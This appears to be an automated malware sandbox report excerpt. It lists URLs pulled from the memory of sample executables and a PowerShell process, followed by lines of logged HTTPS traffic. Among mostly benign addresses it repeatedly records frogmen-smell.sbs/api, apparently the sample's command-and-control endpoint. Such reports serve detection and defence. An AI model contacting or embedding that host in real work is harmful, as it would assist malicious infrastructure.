Source: 000003.ldb.9.dr	String found in binary or memory: https://edgeassetservice.azure
Source: ce1867e0-c703-4933-b520-1e055912c849.tmp.38.dr, e65607d6-3a92-4f2e-9d6f-37eaf17ba295.tmp.38.dr	String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.ldb.9.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/
Source: 06d4af6f50.exe, 0000001E.00000003.3635881339.000000000180B000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628606604.0000000001805000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628353430.0000000001804000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660393375.0000000001817000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sb
Source: 06d4af6f50.exe, 0000001E.00000003.3610517200.0000000001804000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3698747806.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660393375.0000000001817000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882705093.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3797636503.00000000019AE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3825982133.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882352279.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3881285362.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3848870098.00000000019AE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3870010104.00000000019BB000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3881285362.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3826632372.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3881198326.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3831262840.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3845762121.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/
Source: 06d4af6f50.exe, 0000001A.00000003.3514947387.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515654097.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/0
Source: 06d4af6f50.exe, 0000001A.00000003.3514947387.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515654097.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/0(
Source: 06d4af6f50.exe, 00000021.00000003.3870010104.00000000019BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/2
Source: 06d4af6f50.exe, 0000001E.00000003.3677069569.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660696851.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3661291599.0000000001830000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3627889358.000000000182F000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3698525011.0000000001833000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3698747806.0000000001833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/D
Source: 06d4af6f50.exe, 00000021.00000003.3848870098.00000000019AE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3845762121.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/G
Source: 06d4af6f50.exe, 0000001E.00000003.3676183261.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660448469.0000000001822000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3661326025.0000000001822000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/O
Source: 06d4af6f50.exe, 0000001E.00000003.3660448469.0000000001822000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/SW
Source: 06d4af6f50.exe, 0000001A.00000003.3537807652.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/_
Source: 06d4af6f50.exe, 0000001A.00000003.3474452346.00000000006E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/a
Source: 06d4af6f50.exe, 0000001E.00000003.3660393375.0000000001817000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3636048689.0000000001812000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882705093.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882629165.00000000019CE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3845429077.00000000019CC000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3779631003.00000000019BC000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3881285362.00000000019B0000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3848870098.00000000019AE000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3797636503.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3882352279.00000000019CC000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3870010104.00000000019CC000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3845762121.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/api
Source: 06d4af6f50.exe, 0000001E.00000003.3592012775.0000000001806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apiJ
Source: 06d4af6f50.exe, 00000021.00000003.3881198326.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apiO
Source: 06d4af6f50.exe, 0000001A.00000003.3491330555.00000000006E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apiW1
Source: 06d4af6f50.exe, 00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3826632372.00000000019BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apia
Source: 06d4af6f50.exe, 0000001A.00000003.3514947387.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apiaP
Source: 06d4af6f50.exe, 00000021.00000003.3825982133.00000000019BD000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3826632372.00000000019BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apih
Source: 06d4af6f50.exe, 0000001E.00000003.3803858486.000000000181A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/apis
Source: 06d4af6f50.exe, 0000001E.00000003.3676183261.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/k
Source: 06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/lo
Source: 06d4af6f50.exe, 0000001A.00000003.3537807652.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/mG
Source: 06d4af6f50.exe, 0000001E.00000003.3676183261.000000000181A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3660448469.0000000001822000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3699189425.0000000001825000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3661326025.0000000001822000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs/or
Source: 06d4af6f50.exe, 0000001A.00000003.3471415319.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3471670653.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473484383.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/api
Source: 06d4af6f50.exe, 00000021.00000003.3881198326.00000000019B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/api/
Source: 06d4af6f50.exe, 0000001A.00000003.3716780298.00000000006D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apiE
Source: 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apiMicrosoft
Source: 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3491944435.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3490849920.0000000005335000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://frogmen-smell.sbs:443/apitPK
Source: powershell.exe, 00000018.00000002.3414689340.00000287C301D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.3414689340.00000287C292A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 06d4af6f50.exe, 0000001A.00000003.3473228881.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3474071245.000000000533F000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473546102.000000000535C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473512863.000000000533C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593468662.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593283691.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593117408.0000000005F72000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3784152546.0000000005E14000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3782743290.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3783930962.0000000005E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXID/
Source: 06d4af6f50.exe, 0000001A.00000003.3473228881.000000000534B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3474071245.000000000533F000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473546102.000000000535C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3473512863.000000000533C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593468662.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593283691.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3593117408.0000000005F72000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3784152546.0000000005E14000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3782743290.0000000005E23000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3783930962.0000000005E11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.comXIDv10
Source: Session_13376000379202574.9.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: powershell.exe, 00000018.00000002.3439711369.00000287D1975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3414689340.00000287C30A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3439711369.00000287D1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000018.00000002.3414689340.00000287C2E77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000018.00000002.3414689340.00000287C2E77000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: 000003.ldb.9.dr	String found in binary or memory: https://open.spotify.com
Source: 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2566084015.0000000023F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2694732408.0000000023D1E000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3515288006.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3514681544.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000002.3809548607.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3537878656.0000000005338000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3542475225.0000000005336000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3628199133.000000000182A000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3805557720.00000000019DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000002.2675026709.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 06d4af6f50.exe, 0000001A.00000003.3453133094.000000000536B000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453305422.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3472229661.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3453793006.0000000005368000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592636411.0000000005FA4000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3576076055.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575697505.0000000005F99000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3575834748.0000000005F96000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3592740757.0000000005F9C000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3780845655.0000000005E56000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3781114485.0000000005E4D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3760132671.0000000005E46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ce1867e0-c703-4933-b520-1e055912c849.tmp.38.dr, e65607d6-3a92-4f2e-9d6f-37eaf17ba295.tmp.38.dr	String found in binary or memory: https://www.googleapis.com
Source: file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/JWObCjnWoOA.exe
Source: 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2672659024.0000000000EE7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2672659024.0000000000EE7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2566084015.0000000023F89000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3496457696.000000000545D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3613031338.0000000006089000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2566084015.0000000023F89000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3496457696.000000000545D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3613031338.0000000006089000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2566084015.0000000023F89000.00000004.00000020.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001A.00000003.3496457696.000000000545D000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 0000001E.00000003.3613031338.0000000006089000.00000004.00000800.00020000.00000000.sdmp, 06d4af6f50.exe, 00000021.00000003.3804478420.0000000005F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2672659024.0000000000E04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNs
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 000003.ldb.9.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
